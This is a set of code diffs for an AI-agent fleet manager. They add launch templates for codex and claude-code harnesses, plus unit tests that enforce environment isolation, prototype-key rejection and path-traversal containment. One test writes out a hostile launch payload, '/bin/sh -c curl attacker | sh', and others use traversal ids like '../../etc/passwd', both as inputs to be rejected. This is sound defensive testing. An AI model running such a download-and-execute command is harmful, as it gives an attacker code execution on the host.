+//   at 4s on a held pipe (codex-cli 0.144.0-alpha.4), clean SIGTERM stop.
+// - claude-code stream-json print mode: the CLI's long-lived stream-JSON session over stdio —
+//   probed alive at 4s on a held pipe (claude CLI 2.1.156), clean SIGTERM stop. `--verbose` is
+//   required by the CLI when combining `--print` with `--output-format stream-json`.
+const HARNESS_MODE_ARGS = {
+    'claude-code': ['--input-format', 'stream-json', '--output-format', 'stream-json', '--print', '--verbose'],
+    'codex'      : ['app-server']
+};
+
 /**
  * @summary Derive the per-family harness launch template for a Fleet Manager agent: the
  * `{command, args, env}` spec that starts one ISOLATED harness instance bound to its own
@@ -22,24 +36,29 @@ const HARNESS_HOME_ENV_VARS = {
  * never carries a command), keeping the correctness-and-security-critical mapping fully
  * unit-testable.
  *
- * Per-family isolation contracts (the env var each CLI honors as its home):
+ * Per-family contracts — isolation (the home env var each CLI honors) AND liveness (the
+ * long-lived protocol mode each CLI stays resident in; see the mode-args map above — a bare
+ * launch exits immediately without a TTY, so the mode args are part of the template, never a
+ * caller afterthought):
  *
- * - **`'codex'`** → `{command: binaryPath, args: [], env: {CODEX_HOME: instanceHome}}`.
- *   Empirically-proven isolation: the codex CLI honors `CODEX_HOME` — `codex doctor` against a
+ * - **`'codex'`** → `{command: binaryPath, args: ['app-server'], env: {CODEX_HOME: instanceHome}}`.
+ *   Isolation empirically proven: the codex CLI honors `CODEX_HOME` — `codex doctor` against a
  *   fresh home reports no-auth while the default `~/.codex` stays untouched, so per-agent homes
- *   never share auth or session state. Headless / daemon variants (`exec`, `app-server`) are args
- *   the CALLER may append to the returned (fresh, mutable) `args` array — the template pins the
- *   binary + home, not the mode. Two caveats: an app-bundled codex binary (e.g. the ChatGPT.app
- *   `Resources/codex`) is an ALPHA channel that self-updates with its app — callers should
- *   pin/verify the binary they pass in; and per-home `codex login` is the operator-owned auth step
- *   (a freshly-derived home starts unauthenticated by design).
+ *   never share auth or session state. Liveness empirically proven: `app-server` on a held-open
+ *   piped stdin stays resident and stops cleanly on SIGTERM. Two caveats: an app-bundled codex
+ *   binary (e.g. the ChatGPT.app `Resources/codex`) is an ALPHA channel that self-updates with its
+ *   app — pin the AiConfig `fleet.harnessBinaries.codex` leaf and read the lifecycle status's
+ *   `binaryVersion` surface; and per-home `codex login` is the operator-owned auth step (a
+ *   freshly-derived home starts unauthenticated by design — the lifecycle status's `authRequired`
+ *   surfaces it).
  *
- * - **`'claude-code'`** → `{command: binaryPath, args: [], env: {CLAUDE_CONFIG_DIR: instanceHome}}`.
- *   Empirically verified (claude CLI 2.1.156, macOS): pointing `CLAUDE_CONFIG_DIR` at a fresh dir
- *   yields a logged-out instance ("Not logged in · Please run /login") and the CLI materializes its
- *   config tree (`.claude.json`, `projects/`, `sessions/`) inside that dir, while the default
- *   `~/.claude` stays the untouched ambient auth home. Per-home `/login` is the operator-owned
- *   auth step.
+ * - **`'claude-code'`** → `{command: binaryPath, args: [<stream-json print mode>], env:
+ *   {CLAUDE_CONFIG_DIR: instanceHome}}`. Isolation empirically verified (claude CLI 2.1.156,
+ *   macOS): pointing `CLAUDE_CONFIG_DIR` at a fresh dir yields a logged-out instance materializing
+ *   its own config tree (`.claude.json`, `projects/`, `sessions/`) while the default `~/.claude`
+ *   stays the untouched ambient auth home. Liveness empirically verified: the stream-JSON session
+ *   on a held-open piped stdin stays resident and stops cleanly on SIGTERM. Per-home `/login` is
+ *   the operator-owned auth step.
  *
  * GUI launches (`open -n -a …`) are **excluded by design**: `open` detaches — the spawned process
  * is the launcher, not the harness — so the Fleet Manager could never supervise (signal, reap, or
@@ -72,7 +91,7 @@ export function deriveHarnessLaunchSpec({harnessType, instanceHome, binaryPath} 
         throw new Error(`deriveHarnessLaunchSpec: unsupported harnessType '${harnessType}'. Supported: ${supported}.`);
     }
 
-    return {command: binaryPath, args: [], env: {[homeEnvVar]: instanceHome}};
+    return {command: binaryPath, args: [...HARNESS_MODE_ARGS[harnessType]], env: {[homeEnvVar]: instanceHome}};
 }
 
 /**

--- a/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
+++ b/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
@@ -448,6 +448,52 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService — curated launch + 
         expect(FleetLifecycleService.isRunning('bare')).toBe(true);
     });
 
+    test('EXECUTABILITY, not existence: a mode-0644 PATH candidate fails synchronously — no record, no async permission-flip', () => {
+        // the exact falsifier shape: a real file that EXISTS on the child PATH but is not
+        // executable — an existence-only preflight passes it, publishes running/pid:null, then
+        // flips to failed on the child's asynchronous permission error
+        const binDir = fs.mkdtempSync(path.join(os.tmpdir(), 'fleet-noexec-'));
+        fs.writeFileSync(path.join(binDir, 'plainfile-harness'), '#!/bin/sh\nexit 0\n', {mode: 0o644});
+
+        const spawn = install({agents: {noexec: {id: 'noexec', githubUsername: 'noexec', harnessType: 'codex', metadata: {launch: {
+            command: 'plainfile-harness',
+            args   : [],
+            env    : {PATH: binDir}
+        }}}}, creds: {}});
+
+        expect(() => FleetLifecycleService.start('noexec')).toThrow(/not found or not executable/);
+        expect(spawn.calls).toHaveLength(0);
+        expect(FleetLifecycleService.processes.has('noexec')).toBe(false);
+
+        fs.rmSync(binDir, {recursive: true, force: true});
+    });
+
+    test('REAL-PROCESS child-cwd resolution: a relative ./bin command under opts.cwd preflights AND spawns consistently', async () => {
+        // spawn-equivalence end-to-end: the resolver accepts the relative command against the
+        // CHILD's cwd, and the real spawn (which chdirs before exec) resolves it identically —
+        // the child stays alive on the held-open stdin pipe, then stops on SIGTERM
+        const childCwd = fs.mkdtempSync(path.join(os.tmpdir(), 'fleet-relcwd-'));
+        fs.mkdirSync(path.join(childCwd, 'bin'));
+        fs.writeFileSync(path.join(childCwd, 'bin', 'h'), '#!/bin/sh\ncat\n', {mode: 0o755});
+
+        install({agents: {rel: {id: 'rel', githubUsername: 'rel', harnessType: 'codex', metadata: {launch: {
+            command: './bin/h',
+            args   : [],
+            env    : {}
+        }}}}, creds: {}});
+        FleetLifecycleService.spawnFn = null;   // the REAL child_process.spawn
+
+        FleetLifecycleService.start('rel', {cwd: childCwd});
+
+        await new Promise(resolve => setTimeout(resolve, 300));
+        expect(FleetLifecycleService.isRunning('rel')).toBe(true);
+
+        const stopped = await FleetLifecycleService.stop('rel');
+        expect(stopped.success).toBe(true);
+
+        fs.rmSync(childCwd, {recursive: true, force: true});
+    });
+
     test('REAL-PROCESS liveness falsifier: the service topology keeps an actual child alive; SIGTERM stops it', async () => {
         // Through the service's EXACT spawn path (no stub): a real `node` child that only survives
         // if stdin stays open — precisely the property the harness CLIs demand. A regression to

--- a/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
+++ b/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
@@ -79,6 +79,9 @@ function install({agents = {}, creds = {}} = {}) {
     // the next serial sibling (singleton-stateful service).
     FleetLifecycleService.credentialEnvVar  = 'GH_TOKEN';
     FleetLifecycleService.bridgeTokenEnvVar = 'NEO_FLEET_BRIDGE_TOKEN';
+    // Reset the curated-launch resolution fields too — fallback tests set them explicitly.
+    FleetLifecycleService.instanceRoot       = null;
+    FleetLifecycleService.harnessBinaryPaths = null;
     return spawnStub;
 }
 
@@ -199,8 +202,13 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService', () => {
         expect(() => FleetLifecycleService.start('ghost')).toThrow(/unknown agent/);
     });
 
-    test('start refuses an agent with no launch spec', () => {
-        install({agents: {a: {id: 'a', githubUsername: 'a', harnessType: 'codex', metadata: {}}}, creds: {}});
+    test('start refuses an agent with no launch spec and no built-in launch template (untemplated harnessType)', () => {
+        install({agents: {a: {id: 'a', githubUsername: 'a', harnessType: 'gemini-cli', metadata: {}}}, creds: {}});
+        expect(() => FleetLifecycleService.start('a')).toThrow(/no launch spec/);
+    });
+
+    test('start refuses an agent whose explicit metadata.launch carries no command', () => {
+        install({agents: {a: {id: 'a', githubUsername: 'a', harnessType: 'codex', metadata: {launch: {args: ['--serve']}}}}, creds: {}});
         expect(() => FleetLifecycleService.start('a')).toThrow(/no launch spec/);
     });
 

--- a/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
+++ b/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
@@ -11,8 +11,11 @@ setup({
     }
 });
 
-import {test, expect}   from '@playwright/test';
-import {EventEmitter}   from 'events';
+import {test, expect} from '@playwright/test';
+import {EventEmitter} from 'events';
+import fs             from 'fs';
+import os             from 'os';
+import path           from 'path';
 
 import Neo                   from '../../../../src/Neo.mjs';
 import * as core             from '../../../../src/core/_export.mjs';
@@ -187,13 +190,15 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService', () => {
         expect(spawn.calls).toHaveLength(0); // never spawned
     });
 
-    test('a tokenless agent starts without injecting a fleet credential', () => {
-        const before = process.env.GH_TOKEN,
-              spawn  = install({agents: {a: agentDef('a')}, creds: {}});
+    test('a tokenless agent starts with NO credential in its env — the parent\'s ambient token never crosses', () => {
+        const spawn = install({agents: {a: agentDef('a')}, creds: {}});
         FleetLifecycleService.start('a');
 
-        // no fleet credential resolved → the env var is left at its ambient value, not a fleet token
-        expect(spawn.calls[0].opts.env.GH_TOKEN).toBe(before);
+        // no fleet credential resolved → the slot is EMPTY. The parent process may well carry its
+        // own ambient GH_TOKEN; a tokenless peer silently inheriting it would collapse the
+        // per-agent credential boundary (the cycle-1 review's falsifier) — the minimal allowlisted
+        // child env excludes it by construction.
+        expect(spawn.calls[0].opts.env.GH_TOKEN).toBeUndefined();
         expect(FleetLifecycleService.isRunning('a')).toBe(true);
     });
 
@@ -202,9 +207,9 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService', () => {
         expect(() => FleetLifecycleService.start('ghost')).toThrow(/unknown agent/);
     });
 
-    test('start refuses an agent with no launch spec and no built-in launch template (untemplated harnessType)', () => {
+    test('start refuses an agent with no launch override and no built-in launch template (untemplated harnessType)', () => {
         install({agents: {a: {id: 'a', githubUsername: 'a', harnessType: 'gemini-cli', metadata: {}}}, creds: {}});
-        expect(() => FleetLifecycleService.start('a')).toThrow(/no launch spec/);
+        expect(() => FleetLifecycleService.start('a')).toThrow(/no launch template/);
     });
 
     test('start refuses an agent whose explicit metadata.launch carries no command', () => {
@@ -290,5 +295,128 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService', () => {
         expect(JSON.stringify(status)).not.toContain('ghp_LEAKED_via_stderr');  // content never surfaced
         expect(status.recentStderr).toBeUndefined();                            // no raw-content field at all
         expect(status.stderrBytes).toBeGreaterThan(0);                          // but it WAS drained (counted)
+    });
+});
+
+// The positive lifecycle matrix: curated launch derivation, the minimal-env credential boundary,
+// reserved/prototype env-key rejection, identity injection, the stdio liveness topology, and the
+// live per-home authRequired surface. The final case is a REAL-process falsifier: it spawns an
+// actual `node` child through the service's exact spawn path and proves the held-open-stdin
+// topology keeps it alive — pure launch-shape tests cannot establish process liveness (the exact
+// gap the cycle-1 review demonstrated on the real harness binaries).
+test.describe('Neo.ai.services.fleet.FleetLifecycleService — curated launch + security matrix', () => {
+    const curatedAgent = (id, harnessType = 'codex') => ({id, githubUsername: id, harnessType, metadata: {}});
+
+    test('curated codex derivation: template args + isolated CODEX_HOME under instanceRoot, keyed by agent id', () => {
+        const spawn = install({agents: {peer2: curatedAgent('peer2')}, creds: {}});
+        FleetLifecycleService.instanceRoot       = '/srv/fleet/instances';
+        // a REAL path-shaped binary so the existence preflight passes (spawn itself is stubbed)
+        FleetLifecycleService.harnessBinaryPaths = {codex: process.execPath};
+
+        FleetLifecycleService.start('peer2');
+
+        const {command, args, opts} = spawn.calls[0];
+        expect(command).toBe(process.execPath);
+        expect(args).toEqual(['app-server']);                                   // the long-lived mode is template-owned
+        expect(opts.env.CODEX_HOME.startsWith('/srv/fleet/instances/')).toBe(true);
+        expect(opts.env.CODEX_HOME).toContain('peer2');                         // agent.id keys the home, never githubUsername-only grain
+    });
+
+    test('curated claude-code derivation is reachable (registry vocabulary aligned) and pins the stream-json mode', () => {
+        const spawn = install({agents: {c2: curatedAgent('c2', 'claude-code')}, creds: {}});
+        FleetLifecycleService.instanceRoot       = '/srv/fleet/instances';
+        FleetLifecycleService.harnessBinaryPaths = {'claude-code': process.execPath};
+
+        FleetLifecycleService.start('c2');
+
+        const {args, opts} = spawn.calls[0];
+        expect(args).toEqual(['--input-format', 'stream-json', '--output-format', 'stream-json', '--print', '--verbose']);
+        expect(Object.keys(opts.env)).toContain('CLAUDE_CONFIG_DIR');
+    });
+
+    test('SECURITY: the child env is the minimal allowlist — an ambient parent secret NEVER crosses into a peer', () => {
+        process.env.NEO_TEST_AMBIENT_SECRET = 'sk_parent_secret';
+        try {
+            const spawn = install({agents: {a: agentDef('a')}, creds: {}});
+            FleetLifecycleService.start('a');
+
+            const env = spawn.calls[0].opts.env;
+            expect(env.NEO_TEST_AMBIENT_SECRET).toBeUndefined();  // a tokenless peer cannot inherit parent secrets
+            expect(env.PATH).toBe(process.env.PATH);              // benign runtime vars DO cross (the allowlist)
+            expect(env.GH_TOKEN).toBeUndefined();                 // creds:{} → no PAT: nothing leaks from the parent's own GH_TOKEN either
+        } finally {
+            delete process.env.NEO_TEST_AMBIENT_SECRET;
+        }
+    });
+
+    test('SECURITY: a launch env naming a reserved slot is rejected fail-fast, before any secret is minted', () => {
+        install({agents: {a: agentDef('a', {metadata: {launch: {command: 'x', args: [], env: {NEO_AGENT_IDENTITY: 'spoofed'}}}})}, creds: {}});
+        expect(() => FleetLifecycleService.start('a')).toThrow(/collides with a reserved env slot/);
+    });
+
+    test('SECURITY: a prototype-mutating launch env key is rejected, never assigned', () => {
+        // JSON.parse creates `__proto__` as an OWN key — exactly what registry-authored JSON yields
+        const launch = JSON.parse('{"command": "x", "args": [], "env": {"__proto__": "polluted"}}');
+        install({agents: {a: agentDef('a', {metadata: {launch}})}, creds: {}});
+        expect(() => FleetLifecycleService.start('a')).toThrow(/prototype-mutating key/);
+    });
+
+    test('every FM spawn binds the child to its fleet identity via NEO_AGENT_IDENTITY', () => {
+        const spawn = install({agents: {a: agentDef('a')}, creds: {}});
+        FleetLifecycleService.start('a');
+        expect(spawn.calls[0].opts.env.NEO_AGENT_IDENTITY).toBe('a');
+    });
+
+    test('the stdio topology holds stdin open as a pipe — the liveness contract for CLI harnesses', () => {
+        const spawn = install({agents: {a: agentDef('a')}, creds: {}});
+        FleetLifecycleService.start('a');
+        expect(spawn.calls[0].opts.stdio).toEqual(['pipe', 'ignore', 'pipe']);
+    });
+
+    test('start fails loud (pre-spawn, pre-secret) on a path-shaped binary that does not exist', () => {
+        install({agents: {ghostbin: curatedAgent('ghostbin')}, creds: {}});
+        FleetLifecycleService.instanceRoot       = os.tmpdir();
+        FleetLifecycleService.harnessBinaryPaths = {codex: '/definitely/not/a/real/binary'};
+        expect(() => FleetLifecycleService.start('ghostbin')).toThrow(/harness binary not found/);
+    });
+
+    test('authRequired surfaces the LIVE per-home auth-marker state for curated launches — and flips without a restart', () => {
+        const root  = fs.mkdtempSync(path.join(os.tmpdir(), 'fleet-auth-')),
+              spawn = install({agents: {peer2: curatedAgent('peer2')}, creds: {}});
+        FleetLifecycleService.instanceRoot       = root;
+        FleetLifecycleService.harnessBinaryPaths = {codex: process.execPath};  // any real path-shaped binary passes preflight
+
+        FleetLifecycleService.start('peer2');
+
+        expect(FleetLifecycleService.status('peer2').authRequired).toBe(true);  // fresh home: login pending
+
+        const home = spawn.calls[0].opts.env.CODEX_HOME;
+        fs.mkdirSync(home, {recursive: true});
+        fs.writeFileSync(path.join(home, 'auth.json'), '{}');
+
+        expect(FleetLifecycleService.status('peer2').authRequired).toBe(false); // marker present: recomputed live
+
+        fs.rmSync(root, {recursive: true, force: true});
+    });
+
+    test('REAL-PROCESS liveness falsifier: the service topology keeps an actual child alive; SIGTERM stops it', async () => {
+        // Through the service's EXACT spawn path (no stub): a real `node` child that only survives
+        // if stdin stays open — precisely the property the harness CLIs demand. A regression to
+        // stdio 'ignore' makes this child exit instantly and the assertion below fail.
+        install({agents: {live: {id: 'live', githubUsername: 'live', harnessType: 'codex', metadata: {launch: {
+            command: process.execPath,
+            args   : ['-e', 'process.stdin.resume(); process.stdin.on("end", () => process.exit(0))'],
+            env    : {}
+        }}}}, creds: {}});
+        FleetLifecycleService.spawnFn = null;  // the REAL child_process.spawn
+
+        FleetLifecycleService.start('live');
+
+        await new Promise(resolve => setTimeout(resolve, 400));
+        expect(FleetLifecycleService.isRunning('live')).toBe(true);             // alive BECAUSE stdin is a held pipe
+
+        const stopped = await FleetLifecycleService.stop('live');
+        expect(stopped.success).toBe(true);
+        expect(FleetLifecycleService.isRunning('live')).toBe(false);
     });
 });

--- a/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
+++ b/test/playwright/unit/ai/FleetLifecycleService.spec.mjs
@@ -58,6 +58,9 @@ function makeSpawnStub() {
 function makeRegistry(agents, creds) {
     return {
         getAgent         : id => agents[id] || null,
+        // The spawn path reads the RAW definition (launch visible) — the public getAgent
+        // projection redacts metadata.launch, so the service consumes this surface instead.
+        getDefinition    : id => agents[id] || null,
         resolveCredential: id => (Object.hasOwn(creds, id) ? creds[id] : null),
         // Stub the Bridge-token mint with a deterministic per-id token, so spawn-injection specs can
         // assert env carriage without touching the real registry's crypto store.
@@ -65,7 +68,9 @@ function makeRegistry(agents, creds) {
     };
 }
 
-const LAUNCH = {command: 'my-harness', args: ['--serve']};
+// A REAL path-shaped binary: the spawn stays stubbed, but the executable preflight stats the
+// command for path-shaped AND bare forms, so the fixture must exist on disk.
+const LAUNCH = {command: process.execPath, args: ['--serve']};
 
 function agentDef(id, extra = {}) {
     return {id, githubUsername: id, harnessType: 'codex', metadata: {launch: LAUNCH}, ...extra};
@@ -76,6 +81,9 @@ function install({agents = {}, creds = {}} = {}) {
     const spawnStub = makeSpawnStub();
     FleetLifecycleService.processes.clear();
     FleetLifecycleService.spawnFn         = spawnStub;
+    // Stub the version probe by default so no spec spawns a real auxiliary subprocess; the
+    // env-boundary test injects its own recorder.
+    FleetLifecycleService.execFileFn      = () => {};
     FleetLifecycleService.registry        = makeRegistry(agents, creds);
     FleetLifecycleService.sigkillTimeoutMs = 50;
     // Reset the configurable env-key fields to their defaults so a collision test cannot bleed into
@@ -98,7 +106,7 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService', () => {
               status = FleetLifecycleService.start('a');
 
         expect(spawn.calls).toHaveLength(1);
-        expect(spawn.calls[0].command).toBe('my-harness');
+        expect(spawn.calls[0].command).toBe(process.execPath);
         expect(spawn.calls[0].args).toEqual(['--serve']);
         expect(status.running).toBe(true);
         expect(status.state).toBe('running');
@@ -377,7 +385,7 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService — curated launch + 
         install({agents: {ghostbin: curatedAgent('ghostbin')}, creds: {}});
         FleetLifecycleService.instanceRoot       = os.tmpdir();
         FleetLifecycleService.harnessBinaryPaths = {codex: '/definitely/not/a/real/binary'};
-        expect(() => FleetLifecycleService.start('ghostbin')).toThrow(/harness binary not found/);
+        expect(() => FleetLifecycleService.start('ghostbin')).toThrow(/harness binary .* not found/);
     });
 
     test('authRequired surfaces the LIVE per-home auth-marker state for curated launches — and flips without a restart', () => {
@@ -397,6 +405,47 @@ test.describe('Neo.ai.services.fleet.FleetLifecycleService — curated launch + 
         expect(FleetLifecycleService.status('peer2').authRequired).toBe(false); // marker present: recomputed live
 
         fs.rmSync(root, {recursive: true, force: true});
+    });
+
+    test('the version probe runs under the SAME minimal env as the supervised child — no ambient-secret leak through the auxiliary subprocess', () => {
+        const spawn     = install({agents: {a: agentDef('a')}, creds: {}}),
+              execCalls = [];
+
+        FleetLifecycleService.execFileFn = (command, args, opts) => execCalls.push({command, args, opts});
+
+        FleetLifecycleService.start('a');
+
+        expect(execCalls).toHaveLength(1);
+        expect(execCalls[0].args).toEqual(['--version']);
+        // identity, not similarity: the probe must receive the exact child-env object — a probe
+        // built from process.env would carry every ambient provider secret to the probed binary
+        expect(execCalls[0].opts.env).toBe(spawn.calls[0].opts.env);
+    });
+
+    test('a BARE command missing from the child PATH fails synchronously — never a transient running/pid:null state', () => {
+        const spawn = install({agents: {ghost: {id: 'ghost', githubUsername: 'ghost', harnessType: 'codex', metadata: {launch: {
+            command: 'definitely-not-a-real-harness-xyz',
+            args   : [],
+            env    : {}
+        }}}}, creds: {}});
+
+        expect(() => FleetLifecycleService.start('ghost')).toThrow(/harness binary .* not found/);
+        expect(spawn.calls).toHaveLength(0);                        // preflight fired BEFORE any spawn
+        expect(FleetLifecycleService.isRunning('ghost')).toBe(false);
+        expect(FleetLifecycleService.processes.has('ghost')).toBe(false);   // no zombie/false-running record
+    });
+
+    test('a bare command that DOES resolve on the child PATH passes preflight', () => {
+        const spawn = install({agents: {bare: {id: 'bare', githubUsername: 'bare', harnessType: 'codex', metadata: {launch: {
+            command: 'node',
+            args   : ['--version'],
+            env    : {}
+        }}}}, creds: {}});
+
+        FleetLifecycleService.start('bare');
+
+        expect(spawn.calls).toHaveLength(1);
+        expect(FleetLifecycleService.isRunning('bare')).toBe(true);
     });
 
     test('REAL-PROCESS liveness falsifier: the service topology keeps an actual child alive; SIGTERM stops it', async () => {

--- a/test/playwright/unit/ai/services/fleet/FleetRegistryService.spec.mjs
+++ b/test/playwright/unit/ai/services/fleet/FleetRegistryService.spec.mjs
@@ -114,4 +114,35 @@ test.describe('Neo.ai.services.fleet.FleetRegistryService — the raw-launch sec
 
         expect(FleetRegistryService.setLaunchOverride('ghost', {command: 'x'})).toBeNull();
     });
+
+    test('the PUBLIC projection redacts the launch override — get/list never expose the Brain-only launch', () => {
+        FleetRegistryService.defineAgent({githubUsername: 'sec', harnessType: 'codex', metadata: {tier: 'A'}});
+        FleetRegistryService.setLaunchOverride('sec', {command: '/opt/custom', args: ['--serve'], env: {PROBE_SECRET: 'x'}});
+
+        expect(FleetRegistryService.getAgent('sec').metadata.launch).toBeUndefined();
+        expect(FleetRegistryService.listAgents().find(def => def.id === 'sec').metadata.launch).toBeUndefined();
+        // ordinary public metadata survives the redaction
+        expect(FleetRegistryService.getAgent('sec').metadata.tier).toBe('A');
+        // while the Brain-internal definition read (the spawn path's surface) carries the launch
+        expect(FleetRegistryService.getDefinition('sec').metadata.launch.env.PROBE_SECRET).toBe('x');
+    });
+
+    test('projections are DEEP CLONES — mutating a returned definition never reaches the registry cache', () => {
+        FleetRegistryService.defineAgent({githubUsername: 'iso', harnessType: 'codex'});
+        FleetRegistryService.setLaunchOverride('iso', {command: '/opt/custom', args: [], env: {}});
+
+        // attack through the public projection: re-attach a launch + tamper metadata
+        const projection = FleetRegistryService.getAgent('iso');
+        projection.metadata.launch   = {command: '/tmp/injected'};
+        projection.metadata.tampered = true;
+
+        expect(FleetRegistryService.getAgent('iso').metadata.tampered).toBeUndefined();
+        expect(FleetRegistryService.getDefinition('iso').metadata.launch.command).toBe('/opt/custom');
+
+        // and through the raw read: the definition clone is equally isolated
+        const def = FleetRegistryService.getDefinition('iso');
+        def.metadata.launch.command = '/tmp/mutated';
+
+        expect(FleetRegistryService.getDefinition('iso').metadata.launch.command).toBe('/opt/custom');
+    });
 });

--- a/test/playwright/unit/ai/services/fleet/FleetRegistryService.spec.mjs
+++ b/test/playwright/unit/ai/services/fleet/FleetRegistryService.spec.mjs
@@ -61,3 +61,57 @@ test.describe('Neo.ai.services.fleet.FleetRegistryService.updateAgent — narrow
         expect(updated.metadata).toEqual({a: 1});
     });
 });
+
+// The mechanical raw-launch stop-line: the wire-reachable write paths (defineAgent + the scoped
+// verbs patching through updateAgent) REJECT a launch payload at the storage boundary, so remote
+// code execution with Brain credentials is not a Body-reachable form. The only launch write path
+// is the registry-internal setLaunchOverride (no bridge member, no wire-allowlist entry — the
+// dispatch spec pins the list).
+test.describe('Neo.ai.services.fleet.FleetRegistryService — the raw-launch security stop-line', () => {
+    let tmpDir;
+
+    test.beforeEach(() => {
+        tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'neo-fleet-reg-'));
+        FleetRegistryService.dataDir = tmpDir;
+    });
+
+    test.afterEach(() => {
+        FleetRegistryService.dataDir = null;
+        fs.rmSync(tmpDir, {recursive: true, force: true});
+    });
+
+    test('defineAgent REJECTS metadata.launch — wire callers send curated harnessType intent only', () => {
+        expect(() => FleetRegistryService.defineAgent({
+            githubUsername: 'evil', harnessType: 'codex',
+            metadata      : {launch: {command: '/bin/sh', args: ['-c', 'curl attacker | sh']}}
+        })).toThrow(/not definable through this surface/);
+
+        // nothing was persisted for the rejected definition
+        expect(FleetRegistryService.getAgent('evil')).toBeNull();
+    });
+
+    test('updateAgent REJECTS a launch key in the metadata patch (the scoped-verb path is equally closed)', () => {
+        FleetRegistryService.defineAgent({githubUsername: 'alice', harnessType: 'codex'});
+
+        expect(() => FleetRegistryService.updateAgent('alice', {metadata: {launch: {command: 'x'}}}))
+            .toThrow(/not patchable through this surface/);
+        expect(FleetRegistryService.getAgent('alice').metadata.launch).toBeUndefined();
+    });
+
+    test('claude-code is a registered harness vocabulary entry (the curated template is reachable)', () => {
+        const def = FleetRegistryService.defineAgent({githubUsername: 'c2', harnessType: 'claude-code'});
+        expect(def.harnessType).toBe('claude-code');
+    });
+
+    test('setLaunchOverride (Brain/operator-only) writes, updates, and clears the launch override', () => {
+        FleetRegistryService.defineAgent({githubUsername: 'ops', harnessType: 'codex'});
+
+        const withLaunch = FleetRegistryService.setLaunchOverride('ops', {command: '/opt/custom', args: ['--serve'], env: {}});
+        expect(withLaunch.metadata.launch.command).toBe('/opt/custom');
+
+        const cleared = FleetRegistryService.setLaunchOverride('ops', null);
+        expect(cleared.metadata.launch).toBeUndefined();
+
+        expect(FleetRegistryService.setLaunchOverride('ghost', {command: 'x'})).toBeNull();
+    });
+});

--- a/test/playwright/unit/ai/services/fleet/deriveAgentInstanceHome.spec.mjs
+++ b/test/playwright/unit/ai/services/fleet/deriveAgentInstanceHome.spec.mjs
@@ -1,0 +1,106 @@
+import {test, expect}            from '@playwright/test';
+import path                      from 'path';
+import {deriveAgentInstanceHome} from '../../../../../../ai/services/fleet/deriveAgentInstanceHome.mjs';
+
+// Pure function — imported directly (no fs / git / Neo runtime), so the suite has no host-runtime
+// side effects and each case is fully isolated. Mirrors deriveAgentRepoPath.spec.
+
+const ROOT = path.resolve('/srv/fleet-instances');
+
+// Convenience: the resolved instance root + the OS separator, for containment assertions.
+const underRoot = p => p === ROOT || p.startsWith(ROOT + path.sep);
+
+test.describe('deriveAgentInstanceHome (Fleet Manager harness instance-home derivation)', () => {
+    test('derives an absolute <root>/<agent>/<harness> path contained under the instance root', () => {
+        const result = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'neo-opus-ada', harnessType: 'codex'});
+
+        expect(path.isAbsolute(result)).toBe(true);
+        expect(underRoot(result)).toBe(true);
+        // exactly two segments below the root: <agent>/<harness>
+        expect(path.relative(ROOT, result).split(path.sep)).toHaveLength(2);
+    });
+
+    test('is stable — identical inputs always map to the identical home (harness auth/state is home-keyed)', () => {
+        const args = {instanceRoot: '/srv/fleet-instances', agentId: 'neo-gpt', harnessType: 'codex'};
+        expect(deriveAgentInstanceHome(args)).toBe(deriveAgentInstanceHome(args));
+    });
+
+    test('is collision-free across distinct agents and distinct harness families', () => {
+        const
+            a = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'alice', harnessType: 'codex'}),
+            b = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'bob',   harnessType: 'codex'}),
+            c = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'alice', harnessType: 'claude-code'});
+
+        expect(a).not.toBe(b); // distinct agents
+        expect(a).not.toBe(c); // distinct harness families
+    });
+
+    test('two DISTINCT fleet agent ids sharing one githubUsername get distinct, restart-stable homes (keyed by agent id, NEVER githubUsername)', () => {
+        // The function takes the fleet agent id ONLY — githubUsername is not an input by design, so
+        // two agents sharing one GitHub identity can never collapse onto one auth/session home.
+        const
+            first  = {instanceRoot: '/srv/fleet-instances', agentId: 'neo-fable',      harnessType: 'codex'},
+            second = {instanceRoot: '/srv/fleet-instances', agentId: 'neo-fable-clio', harnessType: 'codex'};
+
+        expect(deriveAgentInstanceHome(first)).not.toBe(deriveAgentInstanceHome(second)); // distinct homes
+        expect(deriveAgentInstanceHome(first)).toBe(deriveAgentInstanceHome(first));      // restart-stable
+        expect(deriveAgentInstanceHome(second)).toBe(deriveAgentInstanceHome(second));    // restart-stable
+    });
+
+    test('stays collision-free even when two ids sanitize to the same readable form (hash-disambiguated)', () => {
+        // `a/b` and `a-b` both sanitize to the readable form `a-b`; the raw-value hash keeps them apart.
+        const
+            slash = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'a/b', harnessType: 'codex'}),
+            dash  = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'a-b', harnessType: 'codex'});
+
+        expect(slash).not.toBe(dash);
+    });
+
+    test('contains every traversal-bearing or unsafe id under the instance root (security invariant)', () => {
+        for (const agentId of ['../../etc/passwd', '..', '/abs', 'a/b/../..', '__proto__', '.', '....//....']) {
+            const result = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId, harnessType: 'codex'});
+            expect(underRoot(result)).toBe(true);                              // never escapes upward
+            expect(path.relative(ROOT, result).startsWith('..')).toBe(false);  // not above the root
+        }
+        // a traversal-bearing harnessType is contained too
+        const r = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'a', harnessType: '../../../root'});
+        expect(underRoot(r)).toBe(true);
+    });
+
+    test('a traversal attempt as the trusted-root argument throws (only an absolute root is accepted)', () => {
